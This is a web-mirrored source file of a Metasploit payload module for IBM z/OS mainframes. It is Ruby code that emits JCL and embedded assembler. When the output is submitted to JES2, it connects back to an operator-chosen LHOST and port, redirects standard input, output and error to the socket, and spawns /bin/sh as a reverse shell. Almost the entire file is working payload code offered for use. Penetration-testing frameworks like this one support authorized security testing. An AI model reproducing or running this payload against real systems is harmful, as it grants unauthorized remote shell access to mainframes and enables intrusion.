Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/payloads/singles/cmd/mainframe/reverse_shell_jcl.rb
36810 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
# This payload has no ebcdic<->ascii translator built in.

5
# Therefore it must use a shell which does, like mainframe_shell

6
#

7
# this payload will spawn a reverse shell from z/os, when submitted

8
#  on the system as JCL to JES2

9
##

10


11
module MetasploitModule

12
  CachedSize = 8993

13


14
  include Msf::Payload::Single

15
  include Msf::Payload::Mainframe

16
  include Msf::Sessions::CommandShellOptions

17


18
  def initialize(info = {})

19
    super(

20
      merge_info(

21
        info,

22
        'Name' => 'Z/OS (MVS) Command Shell, Reverse TCP',

23
        'Description' => %q{

24
          Provide JCL which creates a reverse shell

25
          This implementation does not include ebcdic character translation,

26
          so a client with translation capabilities is required.  MSF handles

27
          this automatically.

28
        },

29
        'Author' => 'Bigendian Smalls',

30
        'License' => MSF_LICENSE,

31
        'Platform' => 'mainframe',

32
        'Arch' => ARCH_CMD,

33
        'Handler' => Msf::Handler::ReverseTcp,

34
        'Session' => Msf::Sessions::MainframeShell,

35
        'PayloadType' => 'cmd',

36
        'RequiredCmd' => 'jcl',

37
        'Payload' => {

38
          'Offsets' => {},

39
          'Payload' => ''

40
        }

41
      )

42
    )

43
    register_options(

44
      [

45
        # need these defaulted so we can manipulate them in command_string

46
        Opt::LHOST('0.0.0.0'),

47
        Opt::LPORT(4444),

48
        OptString.new('ACTNUM', [true, 'Accounting info for JCL JOB card', 'MSFUSER-ACCTING-INFO']),

49
        OptString.new('PGMNAME', [true, 'Programmer name for JCL JOB card', 'programmer name']),

50
        OptString.new('JCLASS', [true, 'Job Class for JCL JOB card', 'A']),

51
        OptString.new('NOTIFY', [false, 'Notify User for JCL JOB card', '']),

52
        OptString.new('MSGCLASS', [true, 'Message Class for JCL JOB card', 'Z']),

53
        OptString.new('MSGLEVEL', [true, 'Message Level for JCL JOB card', '(0,0)'])

54
      ], self.class

55
    )

56
    register_advanced_options(

57
      [

58
        OptBool.new('NTFYUSR', [true, 'Include NOTIFY Parm?', false]),

59
        OptString.new('JOBNAME', [true, 'Job name for JCL JOB card', 'DUMMY'])

60
      ],

61
      self.class

62
    )

63
  end

64


65
  ##

66
  # Construct Payload

67
  ##

68
  def generate(_opts = {})

69
    super + command_string

70
  end

71


72
  ##

73
  # Setup replacement vars and populate payload

74
  ##

75
  def command_string

76
    if (datastore['JOBNAME'] == 'DUMMY') && !datastore['FTPUSER'].nil?

77
      datastore['JOBNAME'] = (datastore['FTPUSER'] + '1').strip.upcase

78
    end

79
    lhost = Rex::Socket.resolv_nbo(datastore['LHOST'])

80
    lhost = lhost.unpack('H*')[0]

81
    lport = datastore['LPORT']

82
    lport = lport.to_s.to_i.to_s(16).rjust(4, '0')

83


84
    jcl_jobcard +

85
      "//**************************************/\n" \

86
      "//*  SPAWN REVERSE SHELL FOR MSF MODULE*/\n" \

87
      "//**************************************/\n" \

88
      "//*\n" \

89
      "//STEP1      EXEC PROC=ASMACLG,PARM.L=(CALL)\n" \

90
      "//L.SYSLIB   DD  DSN=SYS1.CSSLIB,DISP=SHR\n" \

91
      "//C.SYSIN    DD  *,DLM=ZZ\n" \

92
      "         TITLE  'Spanws Reverse Shell'\n" \

93
      "SPAWNREV CSECT\n" \

94
      "SPAWNREV AMODE 31\n" \

95
      "SPAWNREV RMODE ANY\n" \

96
      "***********************************************************************\n" \

97
      "*        @SETUP registers and save areas                              *\n" \

98
      "***********************************************************************\n" \

99
      "         USING *,15\n" \

100
      "@SETUP0  B     @SETUP1\n" \

101
      "         DROP  15\n" \

102
      "         DS    0H                 # half word boundary\n" \

103
      "@SETUP1  STM   14,12,12(13)       # save our registers\n" \

104
      "         LR    2,13               # callers sa\n" \

105
      "         LR    8,15               # pgm base in R8\n" \

106
      "         USING @SETUP0,8          # R8 for base addressability\n" \

107
      "*************************************\n" \

108
      "* set up data area / addressability *\n" \

109
      "*************************************\n" \

110
      "         L     0,@DYNSIZE         # len of variable area\n" \

111
      "         GETMAIN RU,LV=(0)        # get data stg, len R0\n" \

112
      "         LR    13,1               # data address\n" \

113
      "         USING @DATA,13           # addressability for data area\n" \

114
      "         ST    2,@BACK            # store callers sa address\n" \

115
      "         ST    13,8(,2)           # store our data addr\n" \

116
      "         DS    0H                 # halfword boundaries\n" \

117
      "\n" \

118
      "***********************************************************************\n" \

119
      "*        BPX1SOC set up socket - inline                               *\n" \

120
      "***********************************************************************\n" \

121
      "         CALL  BPX1SOC,                                                X\n" \

122
      "               (DOM,TYPE,PROTO,DIM,CLIFD,                              X\n" \

123
      "               RTN_VAL,RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \

124
      "\n" \

125
      "*******************************\n" \

126
      "*  chk return code, 0 or exit *\n" \

127
      "*******************************\n" \

128
      "         LHI   15,2\n" \

129
      "         L     7,RTN_VAL\n" \

130
      "         CIB   7,0,7,EXITP        # R7 not 0? Time to exit\n" \

131
      "\n" \

132
      "***********************************************************************\n" \

133
      "*        BPX1CON (connect) connect to remote host - inline            *\n" \

134
      "***********************************************************************\n" \

135
      "         XC    SOCKADDR(16),SOCKADDR        # zero sock addr struct\n" \

136
      "         MVI   SOCK_FAMILY,AF_INET          # family inet\n" \

137
      "         MVI   SOCK_LEN,SOCK#LEN            # len of socket\n" \

138
      "         MVC   SOCK_SIN_PORT,CONNSOCK       # port to connect to\n" \

139
      "         MVC   SOCK_SIN_ADDR,CONNADDR       # address to connect to\n" \

140
      "         CALL  BPX1CON,                                                X\n" \

141
      "               (CLIFD,SOCKLEN,SOCKADDR,                                X\n" \

142
      "               RTN_VAL,RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \

143
      "*******************************\n" \

144
      "*  chk return code, 0 or exit *\n" \

145
      "*******************************\n" \

146
      "         LHI   15,3\n" \

147
      "         L     7,RTN_VAL\n" \

148
      "         CIB   7,0,7,EXITP        # R7 not 0? Time to exit\n" \

149
      "\n" \

150
      "*************************************************\n" \

151
      "* order of things to prep child pid             *\n" \

152
      "*  0) Dupe all 3 file desc of CLIFD             *\n" \

153
      "*  1) dupe parent read fd to std input          *\n" \

154
      "*************************************************\n" \

155
      "*******************\n" \

156
      "*****  STDIN  *****\n" \

157
      "*******************\n" \

158
      "         CALL  BPX1FCT,                                                X\n" \

159
      "               (CLIFD,                                                 X\n" \

160
      "               =A(F_DUPFD2),                                           X\n" \

161
      "               =A(F_STDI),                                             X\n" \

162
      "               RTN_VAL,RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \

163
      "****************************************************\n" \

164
      "*  chk return code here anything but -1 is ok      *\n" \

165
      "****************************************************\n" \

166
      "         LHI   15,4               # exit code for this func\n" \

167
      "         L     7,RTN_VAL          # set r7 to rtn val\n" \

168
      "         CIB   7,-1,8,EXITP       # R7 = -1 exit\n" \

169
      "\n" \

170
      "*******************\n" \

171
      "*****  STDOUT *****\n" \

172
      "*******************\n" \

173
      "         CALL  BPX1FCT,                                                X\n" \

174
      "               (CLIFD,                                                 X\n" \

175
      "               =A(F_DUPFD2),                                           X\n" \

176
      "               =A(F_STDO),                                             X\n" \

177
      "               RTN_VAL,RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \

178
      "****************************************************\n" \

179
      "*  chk return code here anything but -1 is ok      *\n" \

180
      "****************************************************\n" \

181
      "         LHI   15,5               # exit code for this func\n" \

182
      "         L     7,RTN_VAL          # set r7 to rtn val\n" \

183
      "         CIB   7,-1,8,EXITP       # R7 = -1 exit\n" \

184
      "\n" \

185
      "*******************\n" \

186
      "*****  STDERR *****\n" \

187
      "*******************\n" \

188
      "         CALL  BPX1FCT,                                                X\n" \

189
      "               (CLIFD,                                                 X\n" \

190
      "               =A(F_DUPFD2),                                           X\n" \

191
      "               =A(F_STDE),                                             X\n" \

192
      "               RTN_VAL,RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \

193
      "****************************************************\n" \

194
      "*  chk return code here anything but -1 is ok      *\n" \

195
      "****************************************************\n" \

196
      "         LHI   15,6               # exit code for this func\n" \

197
      "         L     7,RTN_VAL          # set r7 to rtn val\n" \

198
      "         CIB   7,-1,8,EXITP       # R7 = -1 exit\n" \

199
      "\n" \

200
      "***********************************************************************\n" \

201
      "*        BP1SPN (SPAWN) execute shell '/bin/sh'                       *\n" \

202
      "***********************************************************************\n" \

203
      "         XC    INHE(INHE#LENGTH),INHE   # clear inhe structure\n" \

204
      "         XI    INHEFLAGS0,INHESETPGROUP\n" \

205
      "         SPACE ,\n" \

206
      "         MVC   INHEEYE,=C'INHE'\n" \

207
      "         LH    0,TLEN\n" \

208
      "         STH   0,INHELENGTH\n" \

209
      "         LH    0,TVER\n" \

210
      "         STH   0,INHEVERSION\n" \

211
      "         CALL  BPX1SPN,                                                X\n" \

212
      "               (EXCMDL,EXCMD,EXARGC,EXARGLL,EXARGL,EXENVC,EXENVLL,     X\n" \

213
      "               EXENVL,FDCNT,FDLST,=A(INHE#LENGTH),INHE,RTN_VAL,        X\n" \

214
      "               RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n" \

215
      "         LHI   15,7               # exit code for this func\n" \

216
      "         L     7,RTN_VAL          # set r7 to rtn val\n" \

217
      "         CIB   7,-1,8,EXITP       # R7 = -1 exit\n" \

218
      "\n" \

219
      "****************************************************\n" \

220
      "* cleanup & exit preload R15 with exit code        *\n" \

221
      "****************************************************\n" \

222
      "         XR    15,15              # 4 FOR rc\n" \

223
      "EXITP    L     0,@DYNSIZE\n" \

224
      "         LR    1,13\n" \

225
      "         L     13,@BACK\n" \

226
      "         DROP  13\n" \

227
      "         FREEMAIN RU,LV=(0),A=(1) # Free storage\n" \

228
      "         L     14,12(,13)         # load R14\n" \

229
      "         LM    0,12,20(13)        # load 0-12\n" \

230
      "         BSM   0,14               # branch to caller\n" \

231
      "\n" \

232
      "****************************************************\n" \

233
      "* Constants and Variables                          *\n" \

234
      "****************************************************\n" \

235
      "         DS    0F                 # constants full word boundary\n" \

236
      "F_STDI   EQU   0\n" \

237
      "F_STDO   EQU   1\n" \

238
      "F_STDE   EQU   2\n" \

239
      "*************************\n" \

240
      "* Socket conn variables *         # functions used by pgm\n" \

241
      "*************************\n" \

242
      "CONNSOCK DC    XL2'#{lport}'    # LPORT\n" \

243
      "CONNADDR DC    XL4'#{lhost}'    # LHOST\n" \

244
      "DOM      DC    A(AF_INET)         # AF_INET = 2\n" \

245
      "TYPE     DC    A(SOCK#_STREAM)    # stream = 1\n" \

246
      "PROTO    DC    A(IPPROTO_IP)      # ip = 0\n" \

247
      "DIM      DC    A(SOCK#DIM_SOCKET) # dim_sock = 1\n" \

248
      "SOCKLEN  DC    A(SOCK#LEN+SOCK_SIN#LEN)\n" \

249
      "************************\n" \

250
      "* BPX1SPN vars *********\n" \

251
      "************************\n" \

252
      "EXCMD    DC    CL7'/bin/sh'       # command to exec\n" \

253
      "EXCMDL   DC    A(L'EXCMD)         # len of cmd to exec\n" \

254
      "EXARGC   DC    F'1'               # num of arguments\n" \

255
      "EXARG1   DC    CL2'sh'            # arg 1 to exec\n" \

256
      "EXARG1L  DC    A(L'EXARG1)        # len of arg1\n" \

257
      "EXARGL   DC    A(EXARG1)          # addr of argument list\n" \

258
      "EXARGLL  DC    A(EXARG1L)         # addr of arg len list\n" \

259
      "EXENVC   DC    F'0'               # env var count\n" \

260
      "EXENVL   DC    F'0'               # env var arg list addr\n" \

261
      "EXENVLL  DC    F'0'               # env var arg len addr\n" \

262
      "FDCNT    DC    F'0'               # field count s/b 0\n" \

263
      "FDLST    DC    F'0'               # field list addr s/b 0\n" \

264
      "TVER     DC    AL2(INHE#VER)\n" \

265
      "TLEN     DC    AL2(INHE#LENGTH)\n" \

266
      "         SPACE ,\n" \

267
      "@DYNSIZE DC    A(@ENDYN-@DATA)\n" \

268
      "***************************\n" \

269
      "***** end of constants ****\n" \

270
      "***************************\n" \

271
      "@DATA    DSECT ,\n" \

272
      "         DS    0D\n" \

273
      "PLIST    DS    16A\n" \

274
      "RTN_VAL  DS    F                  # return value\n" \

275
      "RTN_COD  DS    F                  # return code\n" \

276
      "RSN_COD  DS    F                  # reason code\n" \

277
      "CLIFD    DS    F                  # client fd\n" \

278
      "@BACK    DS    A\n" \

279
      "*\n" \

280
      "         BPXYSOCK   LIST=NO,DSECT=NO\n" \

281
      "         BPXYFCTL   LIST=NO,DSECT=NO\n" \

282
      "         BPXYINHE   LIST=NO,DSECT=NO\n" \

283
      "@ENDYN   EQU   *\n" \

284
      "@DATA#LEN EQU  *-@DATA\n" \

285
      "         BPXYCONS   LIST=NO\n" \

286
      "         END   SPAWNREV\n" \

287
      "ZZ\n" \

288
      "//*\n"

289
  end

290
end

291


292